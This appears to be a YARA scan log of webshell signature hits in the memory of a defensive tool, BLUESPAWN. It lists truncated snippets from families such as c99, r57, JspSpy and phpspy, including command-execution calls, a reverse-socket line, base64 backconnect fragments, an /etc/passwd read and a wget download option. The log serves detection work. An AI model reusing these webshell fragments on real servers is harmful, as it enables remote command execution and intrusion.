Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2e582a:$s0: ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
- 0x2e5878:$s1: private static class VEditPropertyInvoker extends DefaultInvoker {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_wso2_5_1_wso2_5_wso2 | Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php | Florian Roth | - 0x2e5ac8:$s7: $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selec
- 0x345b21:$s7: $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selec
- 0x2e5b23:$s8: .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['na
- 0x345b72:$s8: .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['na
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_c5_queryDong_spyjsp2010_t00ls | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp | Florian Roth | - 0x2e5e69:$s8: table.append("<td nowrap> <a href=\"#\" onclick=\"view('"+tbName+"')
- 0x345d94:$s8: table.append("<td nowrap> <a href=\"#\" onclick=\"view('"+tbName+"')
- 0x2e5eba:$s9: "<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"
- 0x345ddb:$s9: "<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_404_data_suiyue | Web Shell - from files 404.jsp, data.jsp, suiyue.jsp | Florian Roth | - 0x2e60ff:$s3: sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+
- 0x345f4a:$s3: sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx | Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2e650f:$s2: echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name
- 0x3461ce:$s2: echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name
- 0x2e6568:$s3: echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1
- 0x34621d:$s3: echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1
- 0x2e65c1:$s9: echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=
- 0x34626c:$s9: echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_807_a_css_dm_he1p_JspSpy_xxx | Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2e6ce8:$s1: "<h2>Remote Control »</h2><input class=\"bt\" onclick=\"var
- 0x3466b5:$s1: "<h2>Remote Control »</h2><input class=\"bt\" onclick=\"var
- 0x2e6d36:$s2: "<p>Current File (import new file name and new file)<br /><input class=\"inpu
- 0x3466f9:$s2: "<p>Current File (import new file name and new file)<br /><input class=\"inpu
- 0x2e6d90:$s3: "<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" i
- 0x346749:$s3: "<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" i
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_201_3_ma_download | Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp | Florian Roth | - 0x2e7023:$s0: <input title="Upload selected file to the current working directory" type="Su
- 0x3468ec:$s0: <input title="Upload selected file to the current working directory" type="Su
- 0x2e707d:$s5: <input title="Launch command in current directory" type="Submit" class="but
- 0x34693c:$s5: <input title="Launch command in current directory" type="Submit" class="but
- 0x2e70d5:$s6: <input title="Delete all selected files and directories incl. subdirs" class=
- 0x34698a:$s6: <input title="Delete all selected files and directories incl. subdirs" class=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp | Florian Roth | - 0x2e75b0:$s4: UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
- 0x2e75f5:$s5: long time = (System.currentTimeMillis() - starttime) / 1000l;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_shell_phpspy_2006_arabicspy | Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php | Florian Roth | - 0x2e784e:$s0: elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype
- 0x346e49:$s0: elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype
- 0x2e78ab:$s8: echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"P
- 0x346e9c:$s8: echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"P
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_in_JFolder_jfolder01_jsp_leo_warn | Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp | Florian Roth | - 0x2e7be6:$s4: sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strD
- 0x3470b3:$s4: sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strD
- 0x2e7c3f:$s9: sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDi
- 0x347102:$s9: sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDi
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2_520_icesword_job_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x2e7fb9:$s2: private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp",
- 0x34733e:$s2: private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp",
- 0x2e800c:$s3: \" name=\"upFile\" size=\"8\" class=\"textbox\" /> <input typ
- 0x347387:$s3: \" name=\"upFile\" size=\"8\" class=\"textbox\" /> <input typ
- 0x2e805b:$s9: if (request.getParameter("password") == null && session.getAttribute("passwor
- 0x3473cc:$s9: if (request.getParameter("password") == null && session.getAttribute("passwor
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY | Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php | Florian Roth | - 0x2e82de:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x315e01:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x347579:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x368622:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x2e832e:$s7: echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILE
- 0x3475bf:$s7: echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILE
- 0x2e8387:$s8: <option value="passthru" <? if ($execfunc=="passthru") { echo "selected";
- 0x34760e:$s8: <option value="passthru" <? if ($execfunc=="passthru") { echo "selected";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_shell_phpspy_2006_arabicspy_hkrkoz | Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php | Florian Roth | - 0x2e863f:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x30d5f5:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x3477d6:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x362514:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files c99.php, Shell [ci | unknown | - 0x2e8937:$s8: else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR"
- 0x3479aa:$s8: else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2008_2009lite_2009mssql | Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php | Florian Roth | - 0x2e8b93:$s0: <a href="javascript:godir(\''.$drive->Path.'/\');
- 0x347b30:$s0: <a href="javascript:godir(\''.$drive->Path.'/\');
- 0x2e8bd1:$s7: p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all
- 0x347b64:$s7: p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz | Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php | Florian Roth | - 0x2e8f32:$s0: $mainpath_info = explode('/', $mainpath);
- 0x2e8f72:$s6: if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "d
- 0x347dbd:$s6: if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "d
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_807_dm_JspSpyJDK5_m_cofigrue | Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp | Florian Roth | - 0x2e9267:$s1: url_con.setRequestProperty("REFERER", ""+fckal+"");
- 0x2e92a7:$s9: FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), "GBK");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx | Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php | Florian Roth | - 0x2e94e1:$s1: if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals
- 0x348142:$s1: if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals
- 0x2e953a:$s9: if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_404_data_in_JFolder_jfolder01_xxx | Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp | Florian Roth | - 0x2e98e0:$s4: <TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TE
- 0x3483c5:$s4: <TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TE
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_reverse_jsp_reverse_jspbd | Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp | Florian Roth | - 0x2e9b4a:$s0: osw = new BufferedWriter(new OutputStreamWriter(os));
- 0x2e9b8c:$s7: sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
- 0x2e9bd8:$s9: isr = new BufferedReader(new InputStreamReader(is));
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc | Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp | Florian Roth | - 0x2e9fa8:$s0: sbFolder.append("<tr><td > </td><td>");
- 0x2e9fe1:$s1: return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
- 0x2ea031:$s5: FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
- 0x2ea06f:$s6: <input type="hidden" name="cmd" value="<%=strCmd%>">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x2ea3df:$s1: while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
- 0x2ea427:$s6: password = (String)session.getAttribute("password");
- 0x308441:$s6: password = (String)session.getAttribute("password");
- 0x2ea468:$s7: insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB231
- 0x348b9b:$s7: insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB231
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx | Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2eacb6:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x301068:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3490dd:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3591db:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x2ead13:$s11: Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC
- 0x349131:$s11: Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_itsec_PHPJackal_itsecteam_shell_jHn | Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php | Florian Roth | - 0x2eafd3:$s0: $link=pg_connect("host=$host dbname=$db user=$user password=$pass");
- 0x2eb024:$s6: while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|
- 0x349348:$s6: while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|
- 0x2eb081:$s9: while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+
- 0x34939b:$s9: while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0x2eb2bb:$s2: if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$stri
- 0x3494ff:$s2: if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$stri
- 0x2eb30e:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x349548:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x2eb355:$s4: <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
- 0x2eb399:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x32502d:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x3495bf:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x372eac:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x2eb3e1:$s9: <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER
- 0x3495fd:$s9: <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 | Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php | Florian Roth | - 0x2eb60d:$s1: <td><input size="48" value="$docr/" name="path" type="text"><input type=
- 0x349753:$s1: <td><input size="48" value="$docr/" name="path" type="text"><input type=
- 0x2eb662:$s2: $uploadfile = $_POST['path'].$_FILES['file']['name'];
- 0x2eb6a4:$s6: elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
- 0x2eb6e4:$s7: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x3150e2:$s7: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_c99shell_c99_w4cking_Shell_xxx | Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci | unknown | - 0x2ebac8:$s0: echo "<b>HEXDUMP:</b><nobr>
- 0x349a64:$s0: echo "<b>HEXDUMP:</b><nobr>
- 0x2ebaf0:$s4: if ($filestealth) {$stat = stat($d.$f);}
- 0x2ebb25:$s5: while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$r
- 0x349aad:$s5: while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$r
- 0x2ebb7b:$s6: if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB
- 0x349af9:$s6: if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB
- 0x2ebbcf:$s8: echo "<center><b>Server-status variables:</b><br><br>";
- 0x2ebc13:$s9: echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea>
- 0x349b7d:$s9: echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz | Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php | Florian Roth | - 0x2ebf1f:$s0: $this -> addFile($content, $filename);
- 0x2ebf52:$s3: function addFile($data, $name, $time = 0) {
- 0x2ebf8a:$s8: function unix2DosTime($unixtime = 0) {
- 0x2ebfbd:$s9: foreach($filelist as $filename){
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_c66_c99_shadows_mod_c99shell | Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php | Florian Roth | - 0x2ec247:$s2: if (unlink(_FILE_)) {@ob_clean(); echo "Thanks for using c99shell v.".$shv
- 0x349f7f:$s2: if (unlink(_FILE_)) {@ob_clean(); echo "Thanks for using c99shell v.".$shv
- 0x2ec2a0:$s3: "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
- 0x2ec2f1:$s4: <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#66
- 0x34a015:$s4: <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#66
- 0x2ec34c:$s7: elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources
- 0x34a066:$s7: elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources
- 0x2ec3a6:$s8: "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehos
- 0x34a0b6:$s8: "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehos
- 0x2ec3fe:$s9: elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!
- 0x34a104:$s9: elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 | Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp | Florian Roth | - 0x2ec787:$s0: ""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>"+
- 0x2ec7d3:$s4: out.println("<h2>File Manager - Current disk ""+(cr.indexOf("/") == 0?
- 0x34a391:$s4: out.println("<h2>File Manager - Current disk ""+(cr.indexOf("/") == 0?
- 0x2ec82b:$s7: String execute = f.canExecute() ? "checked=\"checked\"" : "";
- 0x2ec875:$s8: "<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>
- 0x34a41f:$s8: "<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp | Florian Roth | - 0x2ecc57:$s0: return new Double(format.format(value)).doubleValue();
- 0x2ecc9a:$s5: File tempF = new File(savePath);
- 0x2eccc7:$s9: if (tempF.isDirectory()) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_c99shell_c99_c99shell | Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php | Florian Roth | - 0x2ecf3d:$s2: $bindport_pass = "c99";
- 0x2ecf61:$s5: else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = tr
- 0x34a8a5:$s5: else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = tr
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x2ed273:$s6: $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $d
- 0x34aaad:$s6: $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $d
- 0x2ed2c7:$s7: $sql1 .= $row[1]."\r\n\r\n";
- 0x2ed2f0:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x2ed338:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx | Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php | Florian Roth | - 0x2ed59b:$s3: BODY, TD, TR {
- 0x2ed5b6:$s5: $d=str_replace("\\","/",$d);
- 0x2ed5df:$s6: if ($file=="." || $file=="..") continue;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_807_a_c5_config_css_dm_he1p_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2edef1:$s3: String savePath = request.getParameter("savepath");
- 0x2edf31:$s4: URL downUrl = new URL(downFileUrl);
- 0x2edf61:$s5: if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
- 0x2edfa6:$s6: String downFileUrl = request.getParameter("url");
- 0x2edfe4:$s7: FileInputStream fInput = new FileInputStream(f);
- 0x2ee021:$s8: URLConnection conn = downUrl.openConnection();
- 0x2ee05c:$s9: sis = request.getInputStream();
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2_520_icesword_job_ma1 | Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp | Florian Roth | - 0x2ee315:$s1: <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
- 0x2ee36d:$s3: <input type="hidden" name="_EVENTTARGET" value="" />
- 0x2ee3ae:$s8: <input type="hidden" name="_EVENTARGUMENT" value="" />
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn | Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp | Florian Roth | - 0x2ee778:$s0: <table width="100%" border="1" cellspacing="0" cellpadding="5" bordercol
- 0x34b830:$s0: <table width="100%" border="1" cellspacing="0" cellpadding="5" bordercol
- 0x2ee7cd:$s2: KB </td>
- 0x2ee7e3:$s3: <table width="98%" border="0" cellspacing="0" cellpadding="
- 0x34b887:$s3: <table width="98%" border="0" cellspacing="0" cellpadding="
- 0x2ee82b:$s4: <tr align="center">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY | Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php | Florian Roth | - 0x2eead6:$s4: http://www.4ngel.net
- 0x2f6413:$s4: http://www.4ngel.net
- 0x3173a0:$s4: http://www.4ngel.net
- 0x351215:$s4: http://www.4ngel.net
- 0x2eeaf7:$s5: </a> | <a href="?action=phpenv">PHP
- 0x2eeb27:$s8: echo $msg=@fwrite($fp,$_POST['filecontent']) ? "
- 0x2eeb64:$s9: Codz by Angel
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_locus7s_c99_w4cking_xxx | Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2ef00f:$s1: $res = @shell_exec($cfe);
- 0x2ef035:$s8: $res = @ob_get_contents();
- 0x2ef05c:$s9: @exec($cfe,$res);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_browser_201_3_ma_ma2_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp | Florian Roth | - 0x2ef359:$s1: private static final int EDITFIELD_ROWS = 30;
- 0x2ef393:$s2: private static String tempdir = ".";
- 0x2ef3c4:$s6: <input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>"
- 0x34c010:$s6: <input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_c5_queryDong_spyjsp2010 | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp | Florian Roth | - 0x2ef6b8:$s2: " <select name='encode' class='input'><option value=''>ANSI</option><option val
- 0x34c1fa:$s2: " <select name='encode' class='input'><option value=''>ANSI</option><option val
- 0x2ef714:$s7: JSession.setAttribute("MSG","<span style='color:red'>Upload File Failed!</spa
- 0x34c24c:$s7: JSession.setAttribute("MSG","<span style='color:red'>Upload File Failed!</spa
- 0x2ef76e:$s8: File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName(
- 0x34c29c:$s8: File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName(
- 0x2ef7c9:$s9: ((Invoker)ins.get("vd")).invoke(request,response,JSession);
|
